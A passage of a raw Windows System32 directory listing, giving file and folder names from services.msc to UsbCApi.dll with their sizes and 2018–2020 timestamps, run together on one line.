services.msc +F 24576 09/15/2018 07:29:23 serwvdrv.dll +F 482816 03/07/2020 00:54:16 SessEnv.dll +F 75072 09/15/2018 07:29:22 sessionmsg.exe +F 83968 09/15/2018 07:28:44 setbcdlocale.dll +F 299520 09/15/2018 07:28:43 sethc.exe +F 26624 09/15/2018 07:28:55 SetNetworkLocation.dll +F 37376 09/15/2018 07:28:55 SetNetworkLocationFlyout.dll +F 35840 09/15/2018 07:28:55 SetProxyCredential.dll +F 29184 09/15/2018 07:29:21 setspn.exe +F 134144 09/15/2018 07:28:25 SettingMonitor.dll +F 8192 09/15/2018 07:28:26 settings.dat +F 420864 03/07/2020 00:53:49 SettingsEnvironment.Desktop.dll +F 143872 03/07/2020 00:53:45 SettingsExtensibilityHandlers.dll +F 240128 09/15/2018 07:28:24 SettingsHandlers_Accessibility.dll +F 100864 09/15/2018 07:28:43 SettingsHandlers_AppControl.dll +F 154624 03/07/2020 00:53:37 SettingsHandlers_AppExecutionAlias.dll +F 347648 03/07/2020 00:53:31 SettingsHandlers_AssignedAccess.dll +F 151552 03/07/2020 00:53:37 SettingsHandlers_BackgroundApps.dll +F 264704 09/15/2018 07:28:55 SettingsHandlers_BatteryUsage.dll +F 226816 03/07/2020 00:53:38 SettingsHandlers_CapabilityAccess.dll +F 139264 09/15/2018 07:28:25 SettingsHandlers_ClosedCaptioning.dll +F 180224 03/07/2020 00:53:49 SettingsHandlers_ContentDeliveryManager.dll +F 304128 03/07/2020 00:53:49 SettingsHandlers_Cortana.dll +F 670208 03/07/2020 00:53:48 SettingsHandlers_Devices.dll +F 499712 03/07/2020 00:53:49 SettingsHandlers_Display.dll +F 383488 09/15/2018 07:28:25 SettingsHandlers_Flights.dll +F 359424 09/15/2018 07:28:56 SettingsHandlers_Fonts.dll +F 353280 09/15/2018 07:28:39 SettingsHandlers_Gaming.dll +F 222720 03/07/2020 00:53:40 SettingsHandlers_Geolocation.dll +F 217600 09/15/2018 07:28:55 SettingsHandlers_Gpu.dll +F 139264 09/15/2018 07:28:39 SettingsHandlers_InkingTypingPrivacy.dll +F 276480 03/07/2020 00:53:33 SettingsHandlers_InputPersonalization.dll +F 699392 03/07/2020 00:53:49 SettingsHandlers_Language.dll +F 251904 03/07/2020 00:53:49 SettingsHandlers_ManagePhone.dll +F 276992 09/15/2018 07:28:25 SettingsHandlers_Maps.dll +F 520704 03/07/2020 00:53:49 SettingsHandlers_Notifications.dll +F 4303872 03/07/2020 00:53:45 SettingsHandlers_nt.dll +F 192512 09/15/2018 07:28:25 SettingsHandlers_OneCore_BatterySaver.dll +F 500224 03/07/2020 00:53:48 SettingsHandlers_PCDisplay.dll +F 128000 09/15/2018 07:28:41 SettingsHandlers_Pen.dll +F 169472 09/15/2018 07:28:34 SettingsHandlers_Privacy.dll +F 111616 09/15/2018 07:28:41 SettingsHandlers_QuickActions.dll +F 196608 09/15/2018 07:28:41 SettingsHandlers_Region.dll +F 146432 09/15/2018 07:28:30 SettingsHandlers_SharedExperiences_Rome.dll +F 257024 03/07/2020 00:53:48 SettingsHandlers_SignInOptions.dll +F 200720 03/07/2020 00:53:34 SettingsHandlers_SIUF.dll +F 76288 09/15/2018 07:28:39 SettingsHandlers_SpeechPrivacy.dll +F 155136 09/15/2018 07:28:30 SettingsHandlers_Startup.dll +F 741688 03/07/2020 00:53:34 SettingsHandlers_StorageSense.dll +F 141720 09/15/2018 07:29:22 SettingsHandlers_Troubleshoot.dll +F 538624 03/07/2020 00:53:48 SettingsHandlers_User.dll +F 420864 03/07/2020 00:53:31 SettingsHandlers_UserAccount.dll +F 386560 03/07/2020 00:53:32 SettingsHandlers_WorkAccess.dll +F 482304 03/07/2020 00:53:32 SettingSync.dll +F 1145856 03/07/2020 00:53:46 SettingSyncCore.dll +F 998928 03/07/2020 00:53:46 SettingSyncHost.exe +F 92672 03/07/2020 00:53:32 SettingSyncPolicy.dll +D 0 03/07/2020 00:55:54 setup +F 4704272 03/07/2020 00:53:44 setupapi.dll +F 125440 03/07/2020 00:53:50 setupcl.exe +F 119296 03/07/2020 00:53:46 setupcln.dll +F 22016 09/15/2018 07:28:58 setupetw.dll +F 129024 09/15/2018 07:28:42 setupugc.exe +F 55808 09/15/2018 07:29:14 setx.exe +F 3072 09/15/2018 07:28:45 sfc.dll +F 41984 09/15/2018 07:28:26 sfc.exe +F 50176 09/15/2018 07:28:45 sfc_os.dll +D 0 09/15/2018 07:34:01 Sgrm +F 255128 03/07/2020 00:53:28 SgrmBroker.exe +F 32256 09/15/2018 07:29:13 SgrmClientApi.dll +F 402584 03/07/2020 00:53:28 SgrmEnclave.dll +F 398416 03/07/2020 00:53:28 SgrmEnclave_secure.dll +F 54800 09/15/2018 07:29:13 SgrmLpac.exe +F 140800 09/15/2018 07:28:42 shacct.dll +F 70656 09/15/2018 07:28:42 shacctprofile.dll +F 241664 03/07/2020 00:53:48 SharedPCCSP.dll +F 642048 03/07/2020 00:54:17 SharedRealitySvc.dll +F 28672 09/15/2018 07:28:25 SharedStartModel.dll +F 29696 09/15/2018 07:28:30 SharedStartModelShim.dll +F 1035264 03/07/2020 00:53:38 ShareHost.dll +F 242688 09/15/2018 07:29:25 sharemediacpl.dll +F 680944 03/07/2020 00:53:26 SHCore.dll +F 241664 09/15/2018 07:28:58 shdocvw.dll +F 22137120 03/07/2020 00:53:47 shell32.dll +F 529408 03/07/2020 00:53:35 ShellCommonCommonProxyStub.dll +D 0 03/07/2020 00:55:54 ShellExperiences +F 1155584 03/07/2020 00:54:30 shellstyle.dll +F 10752 09/15/2018 07:28:58 shfolder.dll +F 28672 09/15/2018 07:28:50 shgina.dll +F 16740 09/15/2018 07:29:22 ShiftJIS.uce +F 7680 09/15/2018 07:28:42 shimeng.dll +F 33280 09/15/2018 07:28:57 shimgvw.dll +F 329512 09/15/2018 07:28:59 shlwapi.dll +F 20992 09/15/2018 07:28:52 shpafact.dll +F 402944 09/15/2018 07:28:56 shrpubw.exe +F 134656 09/15/2018 07:28:42 shsetup.dll +F 616448 09/15/2018 07:29:14 shsvcs.dll +F 23552 03/07/2020 00:53:46 shunimpl.dll +F 26624 09/15/2018 07:28:50 shutdown.exe +F 30208 09/15/2018 07:28:51 shutdownext.dll +F 276992 09/15/2018 07:28:52 shutdownux.dll +F 455168 09/15/2018 07:28:58 shwebsvc.dll +D 0 09/15/2018 07:34:01 si-lk +F 52736 09/15/2018 07:29:24 signdrv.dll +F 75264 09/15/2018 07:28:55 sigverif.exe +F 287912 03/07/2020 00:54:17 SIHClient.exe +F 109056 03/07/2020 00:53:41 sihost.exe +F 157696 09/15/2018 07:28:22 SimAuth.dll +F 103424 09/15/2018 07:28:24 SimCfg.dll +F 8192 09/15/2018 07:29:20 simpdata.tlb +D 0 09/15/2018 09:09:27 sk-SK +F 294512 03/07/2020 00:53:28 skci.dll +D 0 09/15/2018 09:09:27 sl-SI +F 144384 09/15/2018 07:28:44 slc.dll +F 22528 03/07/2020 00:53:46 slcext.dll +D 0 03/30/2020 08:36:40 SleepStudy +F 20328 09/15/2018 07:28:26 SlideToShutDown.exe +D 0 09/15/2018 09:07:52 slmgr +F 142904 09/15/2018 07:28:57 slmgr.vbs +F 465920 03/07/2020 00:53:52 slui.exe +F 81920 09/15/2018 07:28:59 slwga.dll +F 69788 09/15/2018 07:28:22 SmallRoom.bin +F 69632 09/15/2018 07:28:32 SmartCardBackgroundPolicy.dll +F 865792 03/07/2020 00:53:46 SmartcardCredentialProvider.dll +F 695296 09/15/2018 07:28:59 SmartCardSimulator.dll +F 2638336 03/07/2020 00:53:37 smartscreen.exe +F 196608 03/07/2020 00:53:37 smartscreenps.dll +F 113664 09/15/2018 07:28:56 SMBHelperClass.dll +F 225792 03/07/2020 00:53:35 smbwmiv2.dll +D 0 09/15/2018 06:09:29 SMI +F 858424 09/15/2018 06:09:27 SmiEngine.dll +F 23552 09/15/2018 07:29:14 smphost.dll +F 75776 03/07/2020 00:54:15 SMSRouter.dll +F 584192 09/15/2018 07:29:24 SmsRouterSvc.dll +F 146888 03/07/2020 00:53:54 smss.exe +F 263120 09/15/2018 07:28:42 SndVol.exe +F 823296 03/07/2020 00:53:51 SndVolSSO.dll +F 3383808 09/15/2018 07:29:22 SnippingTool.exe +F 33280 09/15/2018 07:29:16 snmpapi.dll +F 15872 09/15/2018 07:28:58 snmptrap.exe +F 925 09/15/2018 07:28:39 Snooze_80.contrast-black.png +F 901 09/15/2018 07:28:39 Snooze_80.contrast-white.png +F 925 09/15/2018 07:28:39 Snooze_80.png +F 141824 09/15/2018 07:28:34 socialapis.dll +F 165888 09/15/2018 07:28:44 softkbd.dll +F 10752 09/15/2018 07:28:51 softpub.dll +F 27648 09/15/2018 07:29:14 sort.exe +F 46592 09/15/2018 07:28:53 SortServer2003Compat.dll +F 51200 09/15/2018 07:28:53 SortWindows61.dll +F 72192 09/15/2018 07:28:52 SortWindows6Compat.dll +F 137728 03/07/2020 00:54:18 SpaceAgent.exe +F 177664 03/07/2020 00:54:08 spacebridge.dll +F 742912 03/07/2020 00:54:18 SpaceControl.dll +F 36352 03/07/2020 00:54:08 spaceman.exe +F 171520 03/07/2020 00:53:31 SpatialAudioLicenseSrv.exe +F 256512 03/07/2020 00:53:31 SpatializerApo.dll +F 105984 09/15/2018 07:28:44 spbcd.dll +F 1520 09/15/2018 07:28:22 SpeakersSystemToastIcon.contrast-white.png +F 897 09/15/2018 07:28:22 SpeakersSystemToastIcon.png +F 982528 03/07/2020 00:54:17 Spectrum.exe +F 38400 09/15/2018 07:29:24 SpectrumSyncClient.dll +D 0 09/15/2018 07:33:50 Speech +F 1551360 03/07/2020 00:53:31 SpeechPal.dll +D 0 09/15/2018 07:33:50 Speech_OneCore +F 104448 09/15/2018 07:28:55 spfileq.dll +F 102400 09/15/2018 07:28:56 spinf.dll +F 11264 09/15/2018 07:28:44 spmpm.dll +F 11776 09/15/2018 07:28:44 spnet.dll +D 0 03/07/2020 10:34:54 spool +F 93184 09/15/2018 07:28:25 spoolss.dll +F 774144 03/07/2020 00:53:33 spoolsv.exe +F 163840 03/07/2020 00:53:52 spopk.dll +D 0 09/15/2018 07:33:50 spp +F 272896 09/15/2018 07:29:13 spp.dll +F 138240 03/07/2020 00:53:52 sppc.dll +F 519168 03/07/2020 00:53:46 sppcext.dll +F 421376 09/15/2018 07:28:45 sppcomapi.dll +F 323072 03/07/2020 00:53:53 sppcommdlg.dll +F 578560 03/07/2020 00:53:46 SppExtComObj.Exe +F 43536 09/15/2018 07:28:44 sppinst.dll +F 199168 09/15/2018 07:28:55 sppnp.dll +F 1751640 03/07/2020 00:53:46 sppobjs.dll +F 4589056 03/07/2020 00:53:46 sppsvc.exe +D 0 09/15/2018 07:34:01 sppui +F 262336 03/07/2020 00:53:46 sppwinob.dll +F 144896 09/15/2018 07:28:59 sppwmi.dll +F 15360 09/15/2018 07:29:24 spwinsat.dll +F 506880 09/15/2018 07:28:58 spwizeng.dll +F 5865272 09/15/2018 07:28:58 spwizimg.dll +F 16912 09/15/2018 07:28:58 spwizres.dll +F 11264 09/15/2018 09:08:37 spwmp.dll +F 140288 09/15/2018 09:08:37 sqlcecompact40.dll +F 205312 09/15/2018 09:08:37 sqlceoledb40.dll +F 920064 09/15/2018 09:08:37 sqlceqp40.dll +F 525824 09/15/2018 09:08:37 sqlcese40.dll +F 745472 09/15/2018 07:29:19 sqlsrv32.dll +F 94208 09/15/2018 07:29:19 sqlsrv32.rll +F 47704 09/15/2018 07:28:44 sqmapi.dll +D 0 09/15/2018 09:09:27 sr-Latn-RS +F 375808 09/15/2018 07:28:57 srchadmin.dll +F 72704 09/15/2018 07:29:25 srclient.dll +F 486912 03/07/2020 00:54:18 srcore.dll +F 18944 09/15/2018 07:29:25 srdelayed.exe +F 5120 09/15/2018 07:29:25 SrEvents.dll +F 3761664 03/07/2020 00:53:51 SRH.dll +F 94208 09/15/2018 07:29:25 srhelper.dll +F 280064 09/15/2018 09:10:00 srm.dll +F 1314816 09/15/2018 09:10:00 srmclient.dll +F 90112 09/15/2018 09:10:03 srmlib.dll +F 18716 09/15/2018 07:29:25 srms-apr.dat +F 58882 03/07/2020 00:54:16 srms.dat +F 638464 09/15/2018 09:10:00 srmscan.dll +F 171520 09/15/2018 09:10:00 srmshell.dll +F 275968 09/15/2018 09:10:00 srmstormod.dll +F 87040 09/15/2018 09:10:00 srmtrace.dll +F 31744 09/15/2018 09:10:00 srm_ps.dll +F 147968 03/07/2020 00:53:51 srpapi.dll +F 312832 09/15/2018 09:10:05 SrpUxNativeSnapIn.dll +F 249344 03/07/2020 00:54:18 srrstr.dll +F 57856 03/07/2020 00:54:18 SrTasks.exe +D 0 03/30/2020 08:46:00 sru +F 63488 09/15/2018 07:29:13 srumapi.dll +F 214528 03/07/2020 00:53:29 srumsvc.dll +F 112088 09/15/2018 07:28:46 srvcli.dll +F 279040 03/07/2020 00:53:28 srvsvc.dll +F 27136 09/15/2018 07:29:25 srwmi.dll +F 46592 09/15/2018 07:28:45 sscore.dll +F 13312 09/15/2018 07:28:29 sscoreext.dll +F 449536 09/15/2018 07:28:22 ssdm.dll +F 62464 09/15/2018 07:29:13 ssdpapi.dll +F 232448 03/07/2020 00:54:08 ssdpsrv.dll +F 178200 09/15/2018 07:28:46 sspicli.dll +F 29184 09/15/2018 07:28:46 sspisrv.dll +F 132920 09/15/2018 06:09:27 SSShim.dll +F 221184 09/15/2018 07:29:22 ssText3d.scr +F 206848 09/15/2018 07:28:57 sstpsvc.dll +F 5577872 03/07/2020 00:53:35 StartTileData.dll +F 24576 09/15/2018 07:28:50 Startupscan.dll +F 676048 03/07/2020 00:53:25 StateRepository.Core.dll +F 144384 03/07/2020 00:53:31 StaticDictDS.dll +F 65024 09/15/2018 07:28:43 stclient.dll +F 18432 09/15/2018 07:28:22 stdole2.tlb +F 7168 09/15/2018 07:28:55 stdole32.tlb +F 322048 03/07/2020 00:54:12 sti.dll +F 189440 03/07/2020 00:54:15 sti_ci.dll +F 421888 03/07/2020 00:53:34 stobject.dll +F 100352 09/15/2018 07:29:14 StorageContextHandler.dll +F 112640 09/15/2018 07:29:16 StorageUsage.dll +F 2714624 03/07/2020 00:54:08 storagewmi.dll +F 26112 09/15/2018 07:29:14 storagewmi_passthru.dll +F 92672 09/15/2018 07:29:14 stordiag.exe +F 275456 03/07/2020 00:53:41 storewuauth.dll +F 68096 09/15/2018 07:28:44 Storprop.dll +F 988672 03/07/2020 00:54:11 StorSvc.dll +F 27136 09/15/2018 07:28:22 streamci.dll +F 677144 03/07/2020 00:53:25 StructuredQuery.dll +F 93702 09/15/2018 07:29:22 SubRange.uce +F 16384 09/15/2018 07:29:16 subst.exe +F 676352 03/07/2020 00:54:09 sud.dll +D 0 09/15/2018 09:09:27 sv-SE +F 51696 09/15/2018 07:28:45 svchost.exe +F 13824 09/15/2018 07:29:23 svsvc.dll +F 203264 09/15/2018 07:28:41 SwitcherDataModel.dll +F 456704 09/15/2018 07:28:39 swprv.dll +F 78336 09/15/2018 07:29:13 sxproxy.dll +F 629096 09/15/2018 07:28:44 sxs.dll +F 45568 09/15/2018 07:29:14 sxshared.dll +F 33792 03/07/2020 00:53:53 sxssrv.dll +F 29184 09/15/2018 07:28:44 sxsstore.dll +F 36352 09/15/2018 07:28:44 sxstrace.exe +F 36152 09/15/2018 09:10:04 SyncAppvPublishingServer.exe +F 1720 09/15/2018 07:29:41 SyncAppvPublishingServer.vbs +F 3370496 09/15/2018 07:29:22 SyncCenter.dll +F 632320 03/07/2020 00:54:28 SyncController.dll +F 45568 09/15/2018 07:29:14 SyncHost.exe +F 14336 09/15/2018 07:29:14 SyncHostps.dll +F 410624 09/15/2018 07:29:14 SyncInfrastructure.dll +F 37376 09/15/2018 07:29:14 SyncInfrastructureps.dll +F 61440 09/14/2018 18:02:00 SyncProxy.dll +F 79872 09/15/2018 07:29:14 Syncreg.dll +F 2560 09/14/2018 18:04:00 SyncRes.dll +F 327168 03/07/2020 00:53:32 SyncSettings.dll +F 396288 09/14/2018 17:53:00 syncutil.dll +F 125440 09/15/2018 07:28:55 sysclass.dll +F 337408 09/15/2018 07:28:45 sysdm.cpl +F 1062400 03/07/2020 00:54:18 sysmain.dll +F 484864 09/15/2018 07:29:21 sysmon.ocx +F 25088 09/15/2018 07:28:46 sysntfy.dll +D 0 03/07/2020 10:38:37 Sysprep +F 3317 09/15/2018 07:28:55 sysprint.sep +F 3666 09/15/2018 07:28:55 sysprtj.sep +F 42496 09/15/2018 07:29:22 SysResetErr.exe +F 18944 09/15/2018 07:28:56 syssetup.dll +F 303104 09/15/2018 07:28:45 systemcpl.dll +F 30208 09/15/2018 07:28:26 SystemEventsBrokerClient.dll +F 274432 03/07/2020 00:53:35 SystemEventsBrokerServer.dll +F 102912 09/15/2018 07:29:22 systeminfo.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesAdvanced.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesComputerName.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesDataExecutionPrevention.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesHardware.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesPerformance.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesProtection.exe +F 83968 09/15/2018 07:28:44 SystemPropertiesRemote.exe +F 522104 03/07/2020 00:54:16 systemreset.exe +D 0 03/07/2020 00:55:55 SystemResetPlatform +F 399376 03/07/2020 00:53:34 SystemSettings.DataModel.dll +F 165376 09/15/2018 09:10:03 SystemSettings.DeviceEncryptionHandlers.dll +F 1262592 03/07/2020 00:53:45 SystemSettings.Handlers.dll +F 164152 03/07/2020 00:53:50 SystemSettings.SettingsExtensibility.dll +F 495616 03/07/2020 00:53:47 SystemSettings.UserAccountsHandlers.dll +F 496872 03/07/2020 00:53:47 SystemSettingsAdminFlows.exe +F 205072 09/15/2018 07:28:25 SystemSettingsBroker.exe +F 40744 09/15/2018 07:29:14 SystemSettingsRemoveDevice.exe +F 4018688 03/07/2020 00:53:47 SystemSettingsThresholdAdminFlowUI.dll +F 55808 09/15/2018 07:28:30 SystemSupportInfo.dll +F 82432 09/15/2018 07:28:30 SystemUWPLauncher.exe +F 10752 09/15/2018 07:28:25 systray.exe +F 180224 03/07/2020 00:53:57 t2embed.dll +D 0 09/15/2018 07:34:01 ta-in +D 0 09/15/2018 07:34:01 ta-lk +F 165888 09/15/2018 07:29:22 Tabbtn.dll +F 77312 09/15/2018 07:29:22 TabbtnEx.dll +F 83456 09/15/2018 07:29:22 tabcal.exe +F 699904 09/15/2018 07:29:22 TabletPC.cpl +F 229376 03/07/2020 00:53:53 TabSvc.dll +F 62976 09/15/2018 07:29:23 takeown.exe +F 980992 09/15/2018 07:29:22 tapi3.dll +F 234496 09/15/2018 07:29:22 tapi32.dll +F 32768 09/15/2018 07:29:22 tapilua.dll +F 65024 09/15/2018 07:29:22 TapiMigPlugin.dll +F 12288 09/15/2018 07:29:22 tapiperf.dll +F 310784 03/07/2020 00:54:16 tapisrv.dll +F 13312 09/15/2018 07:29:22 TapiSysprep.dll +F 109056 09/15/2018 07:29:22 tapiui.dll +F 14848 09/15/2018 07:29:22 TapiUnattend.exe +F 50688 09/15/2018 07:29:16 tar.exe +F 408576 09/15/2018 07:28:34 TaskApis.dll +F 945152 09/15/2018 07:28:25 taskbarcpl.dll +F 478720 03/07/2020 00:53:52 taskcomp.dll +F 1308672 03/07/2020 00:53:31 TaskFlowDataEngine.dll +F 86744 03/07/2020 00:53:52 taskhostw.exe +F 95744 09/15/2018 07:29:23 taskkill.exe +F 101376 09/15/2018 07:29:23 tasklist.exe +F 1390888 03/07/2020 00:53:50 Taskmgr.exe +D 0 03/30/2020 08:36:37 Tasks +F 773208 03/07/2020 00:53:52 taskschd.dll +F 145059 09/15/2018 07:28:44 taskschd.msc +F 59392 09/15/2018 07:28:44 TaskSchdPS.dll +F 64000 03/07/2020 00:53:37 tbauth.dll +F 49072 09/15/2018 07:28:25 tbs.dll +F 758928 03/07/2020 00:53:28 tcblaunch.exe +F 203064 03/07/2020 00:53:28 tcbloader.dll +F 16384 09/15/2018 07:29:21 tcmsetup.exe +F 1673 09/15/2018 07:28:55 tcpbidi.xml +F 239616 09/15/2018 07:28:56 tcpipcfg.dll +F 37888 09/15/2018 07:28:55 tcpmib.dll +F 223232 09/15/2018 07:28:56 tcpmon.dll +F 60124 09/15/2018 07:28:56 tcpmon.ini +F 71680 09/15/2018 07:28:55 tcpmonui.dll +F 12800 09/15/2018 07:29:14 TCPSVCS.EXE +F 84992 09/15/2018 07:29:16 tdc.ocx +F 773632 03/07/2020 00:53:24 tdh.dll +F 293376 03/07/2020 00:53:41 TDLMigration.dll +F 109056 09/15/2018 07:29:22 telephon.cpl +F 91648 03/07/2020 00:53:47 TelephonyInteractiveUser.dll +F 2560 09/15/2018 07:28:39 TelephonyInteractiveUserRes.dll +F 3629568 03/07/2020 00:54:26 tellib.dll +F 76800 09/15/2018 07:28:36 TempSignedLicenseExchangeTask.dll +F 424448 09/15/2018 07:29:22 termmgr.dll +F 1019392 03/07/2020 00:54:16 termsrv.dll +F 79872 09/15/2018 07:28:34 tetheringclient.dll +F 52736 09/15/2018 07:28:34 tetheringconfigsp.dll +F 13312 09/15/2018 07:28:34 TetheringIeProvider.dll +F 235008 03/07/2020 00:53:41 TetheringMgr.dll +F 246784 03/07/2020 00:53:42 tetheringservice.dll +F 222720 09/15/2018 07:28:25 TetheringStation.dll +F 603792 03/07/2020 00:53:40 TextInputFramework.dll +D 0 03/07/2020 00:55:55 th-TH +F 2500096 09/15/2018 07:29:23 themecpl.dll +F 67584 09/15/2018 07:28:44 themeservice.dll +F 2893312 03/07/2020 00:53:53 themeui.dll +F 68096 09/15/2018 07:28:30 threadpoolwinrt.dll +F 386360 03/07/2020 00:53:39 thumbcache.dll +F 34304 09/15/2018 07:28:58 ThumbnailExtractionHost.exe +D 0 09/15/2018 07:34:01 ti-et +F 2560 09/15/2018 07:28:43 tier2punctuations.dll +F 20480 09/15/2018 07:29:23 TieringEngineProxy.dll +F 310272 09/15/2018 07:29:23 TieringEngineService.exe +F 547840 03/07/2020 00:53:42 TileDataRepository.dll +F 35840 09/15/2018 07:28:29 TimeBrokerClient.dll +F 174592 09/15/2018 07:28:29 TimeBrokerServer.dll +F 513536 09/15/2018 07:28:24 timedate.cpl +F 11776 09/15/2018 07:28:53 TimeDateMUICallback.dll +F 31232 09/15/2018 07:29:22 timeout.exe +F 14848 09/15/2018 07:28:25 TimeSyncTask.dll +F 44544 09/15/2018 07:29:23 tlscsp.dll +F 49664 09/15/2018 07:28:46 tokenbinding.dll +F 1466368 03/07/2020 00:53:37 TokenBroker.dll +F 36864 09/15/2018 07:28:29 TokenBrokerCookies.exe +F 71680 03/07/2020 00:53:53 TokenBrokerUI.dll +F 144862 09/15/2018 07:28:25 tpm.msc +F 3584 09/15/2018 07:28:25 TpmCertResources.dll +F 45056 09/15/2018 07:28:25 tpmcompc.dll +F 882176 03/07/2020 00:53:33 TpmCoreProvisioning.dll +F 70656 09/15/2018 07:28:25 TpmInit.exe +F 60416 03/07/2020 00:53:34 TpmTasks.dll +F 384512 09/15/2018 07:29:46 tpmvsc.dll +F 106496 09/15/2018 07:28:58 tpmvscmgr.exe +F 135680 09/15/2018 07:28:58 tpmvscmgrsvr.exe +F 3334144 03/07/2020 00:53:39 tquery.dll +D 0 09/15/2018 09:09:27 tr-TR +F 415232 09/15/2018 07:29:20 tracerpt.exe +F 17920 09/15/2018 07:29:16 TRACERT.EXE +F 42496 09/15/2018 07:28:56 traffic.dll +F 10576 09/15/2018 07:28:26 TransformPPSToWlan.xslt +F 1688 09/15/2018 07:28:26 TransformPPSToWlanCredentials.xslt +F 58880 09/15/2018 07:28:22 TransliterationRanker.dll +F 495632 03/07/2020 00:53:30 TransportDSA.dll +F 19968 09/15/2018 07:29:16 tree.com +F 173568 09/15/2018 07:28:22 trie.dll +F 113152 09/15/2018 07:28:42 trkwks.dll +F 120832 09/15/2018 07:28:50 TrustedSignalCredProv.dll +F 16896 09/15/2018 07:29:21 tsbyuv.dll +F 219136 03/07/2020 00:54:26 tscfgwmi.dll +F 23552 09/15/2018 09:10:03 tscon.exe +F 23552 09/15/2018 09:10:03 tsdiscon.exe +F 12288 09/15/2018 09:09:58 TSErrRedir.dll +F 63488 09/15/2018 07:29:22 tsgqec.dll +F 24064 09/15/2018 09:10:03 tskill.exe +F 410616 03/07/2020 00:54:17 tsmf.dll +F 145408 03/07/2020 00:53:45 TSpkg.dll +F 217600 09/15/2018 09:09:56 tspubwmi.dll +F 76800 09/15/2018 07:29:46 TSSessionUX.dll +F 170496 03/07/2020 00:54:25 tssrvlic.dll +F 53760 03/07/2020 00:54:16 TSTheme.exe +F 40448 09/15/2018 07:28:17 TsUsbGDCoInstaller.dll +F 13312 09/15/2018 07:28:22 TsUsbRedirectionGroupPolicyExtension.dll +F 68096 09/15/2018 07:29:23 TSWbPrxy.exe +F 1217024 03/07/2020 00:53:53 TSWorkspace.dll +F 196776 09/15/2018 07:28:34 ttdinject.exe +F 16536 09/15/2018 07:28:34 ttdloader.dll +F 67384 09/15/2018 07:28:36 ttdplm.dll +F 144288 09/15/2018 07:28:34 ttdrecord.dll +F 1563880 03/07/2020 00:53:41 ttdrecordcpu.dll +F 330672 03/07/2020 00:53:41 ttdwriter.dll +F 258560 09/15/2018 07:28:24 TtlsAuth.dll +F 220160 09/15/2018 07:28:24 TtlsCfg.dll +F 222208 09/15/2018 07:28:50 TtlsExt.dll +F 238904 09/15/2018 07:28:34 tttracer.exe +F 36352 09/15/2018 07:29:22 tvratings.dll +F 185344 03/07/2020 00:53:46 twext.dll +F 2149160 03/07/2020 00:53:24 twinapi.appcore.dll +F 620032 03/07/2020 00:53:53 twinapi.dll +F 765440 03/07/2020 00:53:38 twinui.appcore.dll +F 6942720 03/07/2020 00:53:53 twinui.dll +F 5575168 03/07/2020 00:53:47 twinui.pcshell.dll +F 117760 09/15/2018 07:28:42 txflog.dll +F 12800 09/15/2018 07:28:42 txfw32.dll +F 48128 09/15/2018 07:29:20 typeperf.exe +F 98304 09/15/2018 07:28:30 tzautoupdate.dll +F 2560 03/07/2020 00:53:26 tzres.dll +F 62464 09/15/2018 07:28:44 tzsync.exe +F 4096 09/15/2018 07:28:45 tzsyncres.dll +F 58368 09/15/2018 07:28:25 tzutil.exe +F 273408 03/07/2020 00:53:51 ubpm.dll +F 62464 09/15/2018 07:29:22 ucmhc.dll +F 1022824 03/07/2020 00:53:26 ucrtbase.dll +F 485192 03/07/2020 00:53:28 ucrtbase_enclave.dll +F 56848 09/15/2018 07:28:53 ucsvc.exe +F 68096 03/07/2020 00:54:08 udhisapi.dll +F 947200 03/07/2020 00:53:53 uDWM.dll +F 39936 09/15/2018 07:28:39 UefiCsp.dll +F 41472 09/15/2018 09:10:03 UevAgentPolicyGenerator.exe +F 55808 03/07/2020 00:53:30 UevAppMonitor.exe +F 146 09/15/2018 07:29:41 UevAppMonitor.exe.config +F 3420 09/15/2018 07:29:41 UevCustomActionTypes.tlb +F 13824 09/15/2018 09:10:03 UevTemplateBaselineGenerator.exe +F 11776 09/15/2018 09:10:03 UevTemplateConfigItemGenerator.exe +F 115712 09/15/2018 07:28:38 uexfat.dll +F 153088 09/15/2018 07:28:38 ufat.dll +F 679424 03/07/2020 00:53:38 UiaManager.dll +F 273920 09/15/2018 07:28:30 UIAnimation.dll +F 2433024 03/07/2020 00:53:37 UIAutomationCore.dll +F 43520 09/15/2018 07:29:23 uicom.dll +F 13824 09/15/2018 07:28:44 UIManagerBrokerps.dll +F 36864 09/15/2018 07:28:44 UIMgrBroker.exe +F 282112 09/15/2018 07:28:44 uireng.dll +F 4035584 09/15/2018 07:29:46 UIRibbon.dll +F 835072 09/15/2018 07:29:46 UIRibbonRes.dll +D 0 03/07/2020 00:55:55 uk-UA +F 180024 09/15/2018 07:28:38 ulib.dll +F 61952 09/15/2018 07:28:44 umb.dll +F 19968 09/15/2018 07:29:23 umdmxfrm.dll +F 120832 09/15/2018 07:28:38 umpnpmgr.dll +F 62464 03/07/2020 00:53:31 umpo-overrides.dll +F 160768 03/07/2020 00:53:27 umpo.dll +F 108544 09/15/2018 07:28:56 umpoext.dll +F 88064 09/15/2018 07:29:20 umpowmi.dll +F 395264 09/15/2018 07:29:22 umrdp.dll +F 205624 09/15/2018 07:28:59 unattend.dll +F 78336 09/15/2018 07:28:51 unenrollhook.dll +F 296960 09/15/2018 07:29:22 unimdm.tsp +F 75776 09/15/2018 07:29:23 unimdmat.dll +F 22528 09/15/2018 07:29:22 uniplat.dll +F 1171968 03/07/2020 00:53:41 Unistore.dll +F 40960 09/15/2018 07:28:51 unlodctr.exe +D 0 03/07/2020 00:55:55 UNP +F 256000 09/15/2018 09:08:37 unregmp2.exe +F 562176 09/15/2018 07:28:38 untfs.dll +F 2767160 03/07/2020 00:53:29 UpdateAgent.dll +F 120832 03/07/2020 00:53:29 updatecsp.dll +F 779776 03/07/2020 00:53:29 updatehandlers.dll +F 197632 03/07/2020 00:53:29 updatepolicy.dll +F 118480 09/15/2018 07:28:34 upfc.exe +F 43008 03/07/2020 00:53:53 UpgradeResultsUI.exe +F 384000 09/15/2018 07:29:13 upnp.dll +F 40960 09/15/2018 07:29:13 upnpcont.exe +F 456192 03/07/2020 00:54:08 upnphost.dll +F 790328 03/07/2020 00:53:29 upshared.dll +F 801792 03/07/2020 00:53:50 uReFS.dll +F 572416 09/15/2018 07:28:42 uReFSv1.dll +F 30720 09/15/2018 07:29:16 ureg.dll +F 236032 09/15/2018 07:29:16 url.dll +F 1862656 03/07/2020 00:53:57 urlmon.dll +F 40960 09/15/2018 07:28:38 UsbCApi.dll +F 123392 